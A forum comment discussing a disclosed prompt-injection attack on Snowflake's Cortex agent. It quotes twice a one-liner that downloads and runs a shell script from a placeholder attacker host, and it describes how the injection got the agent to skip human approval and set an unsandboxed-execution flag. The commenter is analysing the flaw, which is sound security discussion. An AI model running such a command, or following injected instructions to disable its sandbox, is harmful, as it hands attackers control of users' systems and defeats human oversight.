Comment by simonw
5 hours ago
One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:
> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
HOW did the prompt injection manipulate the model in that way?
> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.
Process substitution is a new concept to me. Definitely adding that method to the toolbox.
It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.